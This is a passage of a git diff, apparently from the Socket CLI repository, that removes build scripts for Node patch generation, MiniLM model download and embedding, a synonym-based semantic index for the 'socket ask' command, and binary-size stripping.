mkdir(PATCHES_OUTPUT_DIR, { recursive: true }) - - // Generate patches - const patches = [] - - try { - patches.push(await generateV8IncludePathsPatch()) - } catch (e) { - logger.error(`${colors.red('✗')} Failed to generate V8 include paths patch:`, e.message) - } - - try { - patches.push(await generateSeaPatch()) - } catch (e) { - logger.error(`${colors.red('✗')} Failed to generate SEA patch:`, e.message) - } - - logger.log('') - logger.log('🎉 Patch generation complete!') - logger.log('') - logger.log('Generated patches:') - for (const patch of patches) { - logger.log(` - ${patch}`) - } - logger.log('') - logger.log('📝 Next steps:') - logger.log(' 1. Review the generated patches') - logger.log( - ' 2. Update build-yao-pkg-node.mjs to reference new patch files', - ) - logger.log(' 3. 
Test the build with new patches') - logger.log('') -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Patch generation failed:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/llm/README.md b/scripts/llm/README.md deleted file mode 100644 index 52e51af95..000000000 --- a/scripts/llm/README.md +++ /dev/null @@ -1,90 +0,0 @@ -# LLM & Semantic Understanding Scripts - -Scripts for building semantic understanding capabilities for Socket CLI without heavy ML models. - -## Philosophy - -**Goal**: Enable natural language understanding for `socket ask` command **WITHOUT** shipping 12MB+ ML models. - -**Approach**: Pre-compute semantic indices at build time using lightweight techniques: -- Synonym expansion -- Word overlap matching -- Manual curation of common query patterns - -**Result**: ~3KB semantic index vs 12MB ML model, with 80-90% of the semantic matching capability. - -## Scripts - -### `generate-semantic-index.mjs` - -**Purpose**: Generate semantic similarity index without ML models. - -**What it does**: -- Reads Socket CLI command definitions -- Expands keywords using synonym dictionary -- Creates searchable word index for fast matching - -**Output**: `~/.claude/skills/socket-cli/semantic-index.json` (~3KB) - -**Usage**: -```bash -node scripts/llm/generate-semantic-index.mjs -``` - -**How it works**: -1. Maps synonyms to canonical forms (e.g., "repair" → "fix") -2. Extracts meaningful words from commands, descriptions, examples -3. Creates word overlap index for O(n) matching at runtime - -**Examples**: -- Query: "repair vulnerabilities" → Matches "fix" (via synonym) -- Query: "check my deps" → Matches "scan" (deps = dependencies) - -### `generate-skill-embeddings.mjs` (deprecated) - -**Status**: NOT USED - requires transformers.js (12MB+) - -This was the original approach using ML embeddings. We've replaced it with the -lightweight semantic-index approach above. 
- -### `compute-embeddings-pure.mjs` (deprecated) - -**Status**: NOT USED - requires onnxruntime-node - -Attempted to use pure ONNX without transformers.js wrapper, but still requires -native dependencies and model downloads. - -## Integration - -The semantic index is loaded by `src/commands/ask/handle-ask.mts` at runtime: - -```javascript -// Load semantic index (3KB, pre-computed). -const semanticIndex = JSON.parse( - readFileSync('~/.claude/skills/socket-cli/semantic-index.json') -) - -// Match query using word overlap. -const match = findBestMatch(query, semanticIndex) -``` - -## Claude Skills - -These scripts also generate data for Claude Code skills stored in `~/.claude/skills/socket-cli/`: - -- `SKILL.md` - Skill definition and documentation -- `commands.json` - Structured command data -- `semantic-index.json` - Pre-computed semantic index - -These skills help Claude better understand Socket CLI when providing assistance. - -## Future Enhancements - -Possible improvements (all without ML models): - -1. **Fuzzy matching** - Handle typos using Levenshtein distance -2. **N-gram matching** - Match partial phrases -3. **Context awareness** - Consider previous commands in session -4. **User feedback loop** - Learn from corrections - -All of these can be implemented in pure JavaScript with <10KB overhead. diff --git a/scripts/llm/compute-embeddings-pure.mjs b/scripts/llm/compute-embeddings-pure.mjs deleted file mode 100644 index b14240227..000000000 --- a/scripts/llm/compute-embeddings-pure.mjs +++ /dev/null @@ -1,265 +0,0 @@ -/** - * Pre-compute semantic embeddings WITHOUT transformers.js wrapper. - * Uses ONNX Runtime directly - no sharp, no image processing dependencies. 
- */ - -import { promises as fs, mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import * as ort from 'onnxruntime-node' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const skillDir = path.join( - path.dirname(__dirname), - '../.claude/skills/socket-cli', -) -const cacheDir = path.join(path.dirname(__dirname), '.cache/models') - -logger.log( - '🧠 Computing semantic embeddings (pure ONNX, no transformers.js)...', -) - -// Ensure cache directory exists. -mkdirSync(cacheDir, { recursive: true }) - -// Download model if not cached. -const modelPath = path.join(cacheDir, 'paraphrase-MiniLM-L3-v2.onnx') - -async function downloadModel() { - try { - await fs.access(modelPath) - logger.log('✓ Model already cached') - return - } catch { - logger.log('📦 Downloading paraphrase-MiniLM-L3-v2 model...') - - // Hugging Face model URL (quantized ONNX). - const modelUrl = - 'https://huggingface.co/Xenova/paraphrase-MiniLM-L3-v2/resolve/main/onnx/model_quantized.onnx' - - const response = await fetch(modelUrl) - if (!response.ok) { - throw new Error(`Failed to download model: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - await fs.writeFile(modelPath, Buffer.from(buffer)) - - logger.log(`✓ Downloaded ${buffer.byteLength} bytes`) - } -} - -// Download tokenizer config. 
-const tokenizerPath = path.join(cacheDir, 'tokenizer.json') - -async function downloadTokenizer() { - try { - await fs.access(tokenizerPath) - logger.log('✓ Tokenizer already cached') - return - } catch { - logger.log('📦 Downloading tokenizer...') - - const tokenizerUrl = - 'https://huggingface.co/Xenova/paraphrase-MiniLM-L3-v2/resolve/main/tokenizer.json' - - const response = await fetch(tokenizerUrl) - if (!response.ok) { - throw new Error(`Failed to download tokenizer: ${response.statusText}`) - } - - const json = await response.json() - await fs.writeFile(tokenizerPath, JSON.stringify(json, null, 2)) - - logger.log('✓ Downloaded tokenizer') - } -} - -/** - * Simple tokenizer for BERT-like models. - */ -class SimpleTokenizer { - constructor(vocab) { - this.vocab = vocab - this.idsToTokens = Object.fromEntries( - Object.entries(vocab).map(([k, v]) => [v, k]), - ) - } - - encode(text) { - // Simple whitespace + lowercase tokenization. - // Real implementation would use WordPiece. - const tokens = ['[CLS]'] - - for (const word of text.toLowerCase().split(/\s+/)) { - if (this.vocab[word] !== undefined) { - tokens.push(word) - } else { - // Split into subwords (simplified). - tokens.push('[UNK]') - } - } - - tokens.push('[SEP]') - - return { - input_ids: tokens.map(t => this.vocab[t] ?? this.vocab['[UNK]']), - attention_mask: tokens.map(() => 1), - } - } -} - -/** - * Mean pooling over token embeddings. - */ -function meanPooling(embeddings, attentionMask) { - const seqLen = embeddings.length - const hiddenSize = embeddings[0].length - - const pooled = new Array(hiddenSize).fill(0) - let totalMask = 0 - - for (let i = 0; i < seqLen; i++) { - const mask = attentionMask[i] - totalMask += mask - - for (let j = 0; j < hiddenSize; j++) { - pooled[j] += embeddings[i][j] * mask - } - } - - // Average. - for (let j = 0; j < hiddenSize; j++) { - pooled[j] /= totalMask - } - - return pooled -} - -/** - * Normalize vector to unit length. 
- */ -function normalize(vector) { - const norm = Math.sqrt(vector.reduce((sum, v) => sum + v * v, 0)) - return vector.map(v => v / norm) -} - -/** - * Get embedding for text using ONNX Runtime. - */ -async function getEmbedding(session, tokenizer, text) { - // Tokenize. - const { attention_mask, input_ids } = tokenizer.encode(text) - - // Create tensors. - const inputIdsTensor = new ort.Tensor( - 'int64', - BigInt64Array.from(input_ids.map(BigInt)), - [1, input_ids.length], - ) - const attentionMaskTensor = new ort.Tensor( - 'int64', - BigInt64Array.from(attention_mask.map(BigInt)), - [1, attention_mask.length], - ) - - // Run inference. - const outputs = await session.run({ - input_ids: inputIdsTensor, - attention_mask: attentionMaskTensor, - }) - - // Get embeddings (last_hidden_state). - const embeddings = outputs.last_hidden_state.data - const seqLen = input_ids.length - const hiddenSize = embeddings.length / seqLen - - // Reshape to [seqLen, hiddenSize]. - const embeddingsArray = [] - for (let i = 0; i < seqLen; i++) { - embeddingsArray.push( - Array.from(embeddings.slice(i * hiddenSize, (i + 1) * hiddenSize)), - ) - } - - // Mean pooling. - const pooled = meanPooling(embeddingsArray, attention_mask) - - // Normalize. - return normalize(pooled) -} - -// Main execution. -await downloadModel() -await downloadTokenizer() - -logger.log('📝 Loading model...') -const session = await ort.InferenceSession.create(modelPath) - -logger.log('📝 Loading tokenizer...') -const tokenizerData = JSON.parse(readFileSync(tokenizerPath, 'utf-8')) -const tokenizer = new SimpleTokenizer(tokenizerData.model.vocab) - -logger.log('📝 Loading commands...') -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -// Compute embeddings. 
-const embeddings = { - commands: {}, - examples: {}, - meta: { - model: 'Xenova/paraphrase-MiniLM-L3-v2', - dimension: 384, - generatedAt: new Date().toISOString(), - method: 'pure-onnx', - }, -} - -logger.log('🔢 Computing command embeddings...') -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → ${commandName}`) - - const embedding = await getEmbedding( - session, - tokenizer, - commandData.description, - ) - - embeddings.commands[commandName] = { - description: commandData.description, - embedding, - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -logger.log('🔢 Computing example embeddings...') -for (const [commandName, commandData] of Object.entries(commands.commands)) { - for (const example of commandData.examples) { - const embedding = await getEmbedding(session, tokenizer, example) - embeddings.examples[example] = { - command: commandName, - embedding, - } - } -} - -// Save embeddings. -const outputPath = path.join(skillDir, 'embeddings.json') -writeFileSync(outputPath, JSON.stringify(embeddings, null, 2), 'utf-8') - -logger.log('') -logger.success(`Generated ${outputPath}`) -logger.success(`Embedded ${Object.keys(embeddings.commands).length} commands`) -logger.success( - `Embedded ${Object.keys(embeddings.examples).length} example queries`, -) -logger.log( - `✓ File size: ${(JSON.stringify(embeddings).length / 1024).toFixed(2)} KB`, -) diff --git a/scripts/llm/download-minilm.mjs b/scripts/llm/download-minilm.mjs deleted file mode 100644 index e5b73b659..000000000 --- a/scripts/llm/download-minilm.mjs +++ /dev/null @@ -1,133 +0,0 @@ -/** - * Download MiniLM Model Assets - * - * Downloads paraphrase-MiniLM-L3-v2 vocabulary and model from Hugging Face. - * - * WHAT IT DOWNLOADS: - * 1. tokenizer.json - WordPiece vocabulary (~500KB) - * 2. 
model_quantized.onnx - Quantized model weights (~17MB) - * - * WHY QUANTIZED: - * - 8-bit quantization reduces size by ~4x (68MB → 17MB) - * - Minimal accuracy loss (<1%) - * - Faster inference on CPU - * - * MODEL INFO: - * - Name: sentence-transformers/paraphrase-MiniLM-L3-v2 - * - Type: Sentence transformer for semantic similarity - * - Layers: 3 (L3 = lightweight) - * - Embedding dim: 384 - * - Vocab size: 30,522 tokens - * - * OUTPUT: - * - .cache/models/tokenizer.json - * - .cache/models/model_quantized.onnx - */ - -import { promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -// Hugging Face model repository. -const MODEL_REPO = 'Xenova/paraphrase-MiniLM-L3-v2' -const BASE_URL = `https://huggingface.co/${MODEL_REPO}/resolve/main` - -// Files to download. -const FILES = [ - { - name: 'tokenizer.json', - url: `${BASE_URL}/tokenizer.json`, - description: 'WordPiece vocabulary', - }, - { - name: 'model_quantized.onnx', - url: `${BASE_URL}/onnx/model_quantized.onnx`, - description: 'Quantized ONNX model', - }, -] - -/** - * Download file with progress. 
- */ -async function downloadFile(url, outputPath, description) { - logger.log(`📦 Downloading ${description}...`) - logger.log(` URL: ${url}`) - - const response = await fetch(url) - - if (!response.ok) { - throw new Error(`Failed to download ${url}: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const sizeMB = (buffer.byteLength / 1024 / 1024).toFixed(2) - logger.substep(`Downloaded ${sizeMB} MB`) - logger.substep(`Saved to ${outputPath}`) - logger.log('') - - return buffer.byteLength -} - -/** - * Main download logic. - */ -async function main() { - logger.log('╔═══════════════════════════════════════════════════╗') - logger.log('║ Download MiniLM Model for Socket CLI ║') - logger.log('╚═══════════════════════════════════════════════════╝\n') - - // Create cache directory. - await fs.mkdir(cacheDir, { recursive: true }) - logger.success(`Cache directory: ${cacheDir}`) - logger.log('') - - let totalBytes = 0 - - // Download each file. - for (const file of FILES) { - const outputPath = path.join(cacheDir, file.name) - - // Check if file already exists. - try { - await fs.access(outputPath) - const stats = await fs.stat(outputPath) - logger.log( - `✓ ${file.description} already exists (${(stats.size / 1024 / 1024).toFixed(2)} MB)`, - ) - logger.log(` ${outputPath}\n`) - totalBytes += stats.size - continue - } catch { - // File doesn't exist - download it. - } - - const bytes = await downloadFile(file.url, outputPath, file.description) - totalBytes += bytes - } - - logger.log('╔═══════════════════════════════════════════════════╗') - logger.log('║ Download Complete ║') - logger.log('╚═══════════════════════════════════════════════════╝\n') - logger.log(`Total size: ${(totalBytes / 1024 / 1024).toFixed(2)} MB`) - logger.log('\nNext steps:') - logger.log(' 1. Run: node scripts/llm/embed-minilm.mjs') - logger.log( - ' 2. 
This will create external/minilm-sync.mjs with embedded model', - ) -} - -main().catch(error => { - logger.error(`${colors.red('✗')} Download failed:`, error.message) - process.exit(1) -}) diff --git a/scripts/llm/embed-minilm.mjs b/scripts/llm/embed-minilm.mjs deleted file mode 100644 index bbd2f6c2f..000000000 --- a/scripts/llm/embed-minilm.mjs +++ /dev/null @@ -1,197 +0,0 @@ -/** - * Embed MiniLM Model as Synchronous Loader - * - * Strategy: - * 1. Read model and vocabulary files - * 2. Compress with brotli (best compression) - * 3. Base64 encode compressed data - * 4. Generate external/minilm-sync.mjs with embedded data - * 5. Runtime: decode base64 → decompress brotli → use - * - * WHY BROTLI+BASE64: - * - Brotli: ~40-60% compression on binary data - * - Base64: Safe for Rollup parser (no special chars) - * - Much smaller than plain base64 (23MB → ~8-10MB) - * - Compatible with SEA (Single Executable Application) - * - * OUTPUT: - * external/minilm-sync.mjs containing: - * - Brotli+base64 tokenizer vocabulary - * - Brotli+base64 ONNX model weights - * - Synchronous decompression utilities - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -logger.log('╔═══════════════════════════════════════════════════╗') -logger.log('║ Embed MiniLM Model for Socket CLI ║') -logger.log('╚═══════════════════════════════════════════════════╝\n') - -// Read tokenizer vocabulary. 
-logger.log('📖 Reading tokenizer.json...') -const tokenizerPath = path.join(cacheDir, 'tokenizer.json') -const tokenizerData = readFileSync(tokenizerPath) -const tokenizerCompressed = brotliCompressSync(tokenizerData) -const tokenizerBase64 = tokenizerCompressed.toString('base64') -logger.log(` ✓ Read ${tokenizerData.length} bytes`) -logger.log( - ` ✓ Brotli compressed: ${tokenizerCompressed.length} bytes (${((tokenizerCompressed.length / tokenizerData.length) * 100).toFixed(1)}%)`, -) -logger.log(` ✓ Base64 encoded: ${tokenizerBase64.length} bytes\n`) - -// Read ONNX model. -logger.log('📖 Reading model_quantized.onnx...') -const modelPath = path.join(cacheDir, 'model_quantized.onnx') -const modelData = readFileSync(modelPath) -const modelCompressed = brotliCompressSync(modelData) -const modelBase64 = modelCompressed.toString('base64') -logger.log(` ✓ Read ${modelData.length} bytes`) -logger.log( - ` ✓ Brotli compressed: ${modelCompressed.length} bytes (${((modelCompressed.length / modelData.length) * 100).toFixed(1)}%)`, -) -logger.log(` ✓ Base64 encoded: ${modelBase64.length} bytes\n`) - -// Generate minilm-sync.mjs. -logger.log('📝 Generating external/minilm-sync.mjs...') - -const syncContent = `/** - * Synchronous MiniLM Model Loader - * - * This file is AUTO-GENERATED by scripts/llm/embed-minilm.mjs - * DO NOT EDIT MANUALLY - changes will be overwritten on next build. 
- * - * Contains: - * - Brotli-compressed, base64-encoded tokenizer vocabulary - * - Brotli-compressed, base64-encoded ONNX model - * - Synchronous decompression utilities - * - * Original sizes: - * - Tokenizer: ${(tokenizerData.length / 1024).toFixed(2)} KB → ${(tokenizerBase64.length / 1024).toFixed(2)} KB (${((tokenizerCompressed.length / tokenizerData.length) * 100).toFixed(1)}% compressed) - * - Model: ${(modelData.length / 1024 / 1024).toFixed(2)} MB → ${(modelBase64.length / 1024 / 1024).toFixed(2)} MB (${((modelCompressed.length / modelData.length) * 100).toFixed(1)}% compressed) - * - * Total embedded size: ${((tokenizerBase64.length + modelBase64.length) / 1024 / 1024).toFixed(2)} MB - */ - -import { brotliDecompressSync } from 'node:zlib' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -/** - * Embedded tokenizer vocabulary (brotli-compressed, base64-encoded). - */ -const TOKENIZER_BASE64 = '${tokenizerBase64}' - -/** - * Embedded ONNX model (brotli-compressed, base64-encoded). - */ -const MODEL_BASE64 = '${modelBase64}' - -/** - * Load tokenizer vocabulary synchronously. - * - * @returns Parsed tokenizer configuration - */ -export function loadTokenizerSync() { - // Decode base64 to Buffer. - const compressed = Buffer.from(TOKENIZER_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Parse JSON. - const text = decompressed.toString('utf-8') - return JSON.parse(text) -} - -/** - * Load ONNX model synchronously. - * - * @returns ONNX model as Uint8Array - */ -export function loadModelSync() { - // Decode base64 to Buffer. - const compressed = Buffer.from(MODEL_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Return as Uint8Array for ONNX Runtime. 
- return new Uint8Array(decompressed.buffer, decompressed.byteOffset, decompressed.byteLength) -} - -/** - * Get embedded asset sizes. - * - * @returns Size information - */ -export function getEmbeddedSizes() { - return { - tokenizer: { - compressed: ${tokenizerCompressed.length}, - base64: TOKENIZER_BASE64.length, - original: ${tokenizerData.length}, - }, - model: { - compressed: ${modelCompressed.length}, - base64: MODEL_BASE64.length, - original: ${modelData.length}, - }, - total: { - compressed: ${tokenizerCompressed.length + modelCompressed.length}, - base64: TOKENIZER_BASE64.length + MODEL_BASE64.length, - original: ${tokenizerData.length + modelData.length}, - }, - } -} -` - -const outputPath = path.join(rootPath, 'external/minilm-sync.mjs') -writeFileSync(outputPath, syncContent, 'utf-8') - -logger.log(` ✓ Generated ${outputPath}`) -logger.log( - ` ✓ File size: ${(syncContent.length / 1024 / 1024).toFixed(2)} MB\n`, -) - -logger.log('╔═══════════════════════════════════════════════════╗') -logger.log('║ Embedding Complete ║') -logger.log('╚═══════════════════════════════════════════════════╝\n') - -const originalSizeMB = ( - (tokenizerData.length + modelData.length) / - 1024 / - 1024 -).toFixed(2) -const compressedSizeMB = ( - (tokenizerCompressed.length + modelCompressed.length) / - 1024 / - 1024 -).toFixed(2) -const base64SizeMB = ( - (tokenizerBase64.length + modelBase64.length) / - 1024 / - 1024 -).toFixed(2) - -logger.log('📊 Compression Results:') -logger.log(` Original: ${originalSizeMB} MB`) -logger.log( - ` Compressed: ${compressedSizeMB} MB (${(((tokenizerCompressed.length + modelCompressed.length) / (tokenizerData.length + modelData.length)) * 100).toFixed(1)}%)`, -) -logger.log(` Base64: ${base64SizeMB} MB`) -logger.log('') -logger.log( - ` Total savings: ${(originalSizeMB - base64SizeMB).toFixed(2)} MB (${(100 - (base64SizeMB / originalSizeMB) * 100).toFixed(1)}% reduction)`, -) -logger.log('\nNext steps:') -logger.log(' 1. 
Run build: pnpm run build') -logger.log(' 2. Test LLM features in src/commands/ask/handle-ask.mts') diff --git a/scripts/llm/generate-semantic-index.mjs b/scripts/llm/generate-semantic-index.mjs deleted file mode 100644 index 11426d192..000000000 --- a/scripts/llm/generate-semantic-index.mjs +++ /dev/null @@ -1,205 +0,0 @@ -/** - * Generate semantic similarity index WITHOUT any ML models. - * - * WHAT THIS DOES: - * - Creates a searchable index of Socket CLI commands using simple word matching - * - NO machine learning, NO embeddings, NO 12MB models - * - Just smart word matching with synonym expansion - * - * HOW IT WORKS: - * 1. Reads Socket CLI command definitions from commands.json - * 2. Expands keywords using synonym dictionary (e.g., "fix" = "repair", "resolve") - * 3. Extracts all meaningful words from descriptions, keywords, examples - * 4. Creates a lightweight index for fast word overlap matching - * - * BENEFITS: - * - Tiny footprint (~few KB vs 12MB model) - * - Zero runtime cost (pre-computed at build time) - * - Works offline, no network needed - * - Pure JavaScript, runs anywhere - * - * USAGE: - * At runtime, `socket ask` can match user queries against this index using - * simple word overlap + synonym matching. Example: - * Query: "repair vulnerabilities" → matches "fix" (synonym expansion) - * Query: "check my deps" → matches "scan" (deps = dependencies = package) - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -// Get the directory of this script file. -const __dirname = path.dirname(fileURLToPath(import.meta.url)) - -// Navigate to user's home directory for .claude/skills. 
-const homeDir = process.env.HOME || process.env.USERPROFILE -const skillDir = path.join(homeDir, '.claude/skills/socket-cli') - -logger.log('🔤 Generating semantic index (no ML models)...') - -// Load commands. -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -/** - * Synonym mappings for semantic understanding. - * - * WHAT THIS IS: - * A manually-curated dictionary that maps related words to canonical forms. - * This enables semantic matching without ML models. - * - * EXAMPLE: - * When user says "repair vulnerabilities", we map: - * - "repair" → "fix" (canonical form) - * - Query matches "socket fix" command - * - * WHY THIS WORKS: - * Most natural language queries use synonyms of the same core concepts. - * By expanding synonyms, we achieve ~80-90% of ML semantic matching - * with ZERO runtime cost and ZERO model size. - */ -const SYNONYMS = { - fix: [ - 'repair', - 'resolve', - 'remediate', - 'correct', - 'address', - 'mend', - 'heal', - 'cure', - ], - patch: ['hotfix', 'bandaid', 'workaround', 'apply'], - optimize: [ - 'enhance', - 'improve', - 'upgrade', - 'better', - 'faster', - 'streamline', - 'refine', - ], - scan: [ - 'check', - 'inspect', - 'examine', - 'audit', - 'review', - 'analyze', - 'investigate', - ], - vulnerability: [ - 'vuln', - 'issue', - 'problem', - 'flaw', - 'weakness', - 'bug', - 'security issue', - 'cve', - ], - package: ['dependency', 'module', 'library', 'dep', 'pkg'], - safe: ['secure', 'trusted', 'reliable', 'trustworthy', 'clean'], - score: ['rating', 'grade', 'quality', 'safety'], - replace: ['swap', 'substitute', 'change', 'switch'], - update: ['upgrade', 'refresh', 'renew'], - remove: ['delete', 'eliminate', 'eradicate'], - find: ['locate', 'discover', 'detect', 'identify'], -} - -/** - * Create reverse mapping: synonym → canonical form. 
- * - * EXAMPLE: - * SYNONYMS: { fix: ['repair', 'resolve'] } - * CANONICAL: { fix: 'fix', repair: 'fix', resolve: 'fix' } - * - * This allows O(1) lookup to normalize any word to its canonical form. - */ -const CANONICAL = {} -for (const [canonical, synonyms] of Object.entries(SYNONYMS)) { - // Map canonical word to itself. - CANONICAL[canonical] = canonical - - // Map each synonym to the canonical form. - for (const synonym of synonyms) { - CANONICAL[synonym] = canonical - } -} - -/** - * Normalize word to canonical form. - */ -function canonicalize(word) { - return CANONICAL[word.toLowerCase()] || word.toLowerCase() -} - -/** - * Extract meaningful words from text. - */ -function extractWords(text) { - // Remove punctuation and split. - const words = text - .toLowerCase() - .replace(/[^\w\s-]/g, '') - .split(/\s+/) - .filter(w => w.length > 2) // Filter short words. - - // Canonicalize. - return words.map(canonicalize) -} - -// Build semantic index. -const semanticIndex = { - commands: {}, - meta: { - method: 'word-overlap + synonyms', - generatedAt: new Date().toISOString(), - }, -} - -logger.log('📊 Building semantic index...') - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → ${commandName}`) - - // Extract all relevant words for this command. - const commandWords = new Set() - - // From description. - extractWords(commandData.description).forEach(w => commandWords.add(w)) - - // From keywords. - commandData.keywords.forEach(kw => { - extractWords(kw).forEach(w => commandWords.add(w)) - }) - - // From examples. - commandData.examples.forEach(ex => { - extractWords(ex).forEach(w => commandWords.add(w)) - }) - - semanticIndex.commands[commandName] = { - description: commandData.description, - words: Array.from(commandWords).sort(), - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -// Save semantic index. 
-const outputPath = path.join(skillDir, 'semantic-index.json') -writeFileSync(outputPath, JSON.stringify(semanticIndex, null, 2), 'utf-8') - -logger.log('') -logger.success(`Generated ${outputPath}`) -logger.success(`Indexed ${Object.keys(semanticIndex.commands).length} commands`) -logger.success( - `File size: ${(JSON.stringify(semanticIndex).length / 1024).toFixed(2)} KB`, -) -logger.success('Zero runtime overhead - pure JavaScript!') diff --git a/scripts/llm/generate-skill-embeddings.mjs b/scripts/llm/generate-skill-embeddings.mjs deleted file mode 100644 index e81ad8c12..000000000 --- a/scripts/llm/generate-skill-embeddings.mjs +++ /dev/null @@ -1,93 +0,0 @@ -/** - * Pre-compute semantic embeddings for Socket CLI commands. - * This runs at build time to generate embeddings that can be used - * for semantic matching without requiring a runtime model. - */ - -import { readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { pipeline } from '@xenova/transformers' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const skillDir = path.join( - path.dirname(__dirname), - '../.claude/skills/socket-cli', -) - -logger.log('🧠 Computing semantic embeddings for Socket CLI commands...') - -// Load commands. -const commandsPath = path.join(skillDir, 'commands.json') -const commands = JSON.parse(readFileSync(commandsPath, 'utf-8')) - -// Initialize embedding pipeline. -logger.log('📦 Loading paraphrase-MiniLM-L3-v2 model...') -const embedder = await pipeline( - 'feature-extraction', - 'Xenova/paraphrase-MiniLM-L3-v2', -) - -/** - * Get embedding for a text string. 
- */ -async function getEmbedding(text) { - const result = await embedder(text, { pooling: 'mean', normalize: true }) - return Array.from(result.data) -} - -// Compute embeddings for each command. -const embeddings = { - commands: {}, - meta: { - model: 'Xenova/paraphrase-MiniLM-L3-v2', - dimension: 384, - generatedAt: new Date().toISOString(), - }, -} - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - logger.log(` → Computing embedding for: ${commandName}`) - - // Embed the description (most semantic meaning). - const embedding = await getEmbedding(commandData.description) - - embeddings.commands[commandName] = { - description: commandData.description, - embedding, - keywords: commandData.keywords, - examples: commandData.examples, - } -} - -// Also compute embeddings for all example queries. -logger.log('📝 Computing embeddings for example queries...') -embeddings.examples = {} - -for (const [commandName, commandData] of Object.entries(commands.commands)) { - for (const example of commandData.examples) { - const embedding = await getEmbedding(example) - embeddings.examples[example] = { - command: commandName, - embedding, - } - } -} - -// Save embeddings. 
-const outputPath = path.join(skillDir, 'embeddings.json') -writeFileSync(outputPath, JSON.stringify(embeddings, null, 2), 'utf-8') - -logger.log(`✓ Generated ${outputPath}`) -logger.log(`✓ Embedded ${Object.keys(embeddings.commands).length} commands`) -logger.log( - `✓ Embedded ${Object.keys(embeddings.examples).length} example queries`, -) -logger.log( - `✓ File size: ${(JSON.stringify(embeddings).length / 1024).toFixed(2)} KB`, -) diff --git a/scripts/optimize-binary-size.mjs b/scripts/optimize-binary-size.mjs deleted file mode 100755 index 03f105a20..000000000 --- a/scripts/optimize-binary-size.mjs +++ /dev/null @@ -1,356 +0,0 @@ -#!/usr/bin/env node -/** - * Binary Size Optimization Script - * - * Applies platform-specific optimizations to reduce Socket CLI binary sizes: - * - macOS (darwin): strip, llvm-strip, code signing - * - Linux: strip --strip-all, objcopy section removal - * - Windows: strip --strip-all - * - * Target: Reduce from ~49MB to ~18-28MB per binary - * - * Usage: - * node scripts/optimize-binary-size.mjs [--platform=] - * node scripts/optimize-binary-size.mjs --all - */ - -import { execSync, spawn } from 'node:child_process' -import { existsSync, promises as fs } from 'node:fs' -import { platform as osPlatform } from 'node:os' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootDir = path.join(__dirname, '..') - -// Parse command line arguments. 
-const args = process.argv.slice(2) -let binaryPath = null -let targetPlatform = null -let optimizeAll = false - -for (let i = 0; i < args.length; i++) { - const arg = args[i] - if (arg === '--all') { - optimizeAll = true - } else if (arg.startsWith('--platform=')) { - targetPlatform = arg.slice(11) - } else if (!arg.startsWith('--')) { - binaryPath = arg - } -} - -/** - * Get file size in MB. - */ -async function getFileSizeMB(filePath) { - const stats = await fs.stat(filePath) - return (stats.size / (1024 * 1024)).toFixed(2) -} - -/** - * Check if a command exists. - */ -function commandExists(cmd) { - try { - execSync(`which ${cmd}`, { stdio: 'ignore' }) - return true - } catch { - return false - } -} - -/** - * Execute a command with error handling. - */ -function exec(command, args, options = {}) { - logger.log(` $ ${command} ${args.join(' ')}`) - try { - execSync(`${command} ${args.join(' ')}`, { - stdio: 'inherit', - ...options, - }) - return true - } catch (e) { - logger.error(` ✗ Command failed: ${e.message}`) - return false - } -} - -/** - * Optimize binary for macOS (darwin). - */ -async function optimizeDarwin(binaryPath) { - logger.log('\n🍎 Optimizing macOS binary...') - - const beforeSize = await getFileSizeMB(binaryPath) - logger.log(` Before: ${beforeSize} MB`) - - // Phase 1: Basic stripping. - if (commandExists('strip')) { - logger.log('\n Phase 1: Basic stripping') - exec('strip', [binaryPath]) - } - - // Phase 2: Aggressive stripping with llvm-strip (often better than strip on macOS). - if (commandExists('llvm-strip')) { - logger.log('\n Phase 2: LLVM aggressive stripping') - exec('llvm-strip', [binaryPath]) - } else { - logger.log('\n Phase 2: Aggressive stripping (strip --strip-all)') - exec('strip', 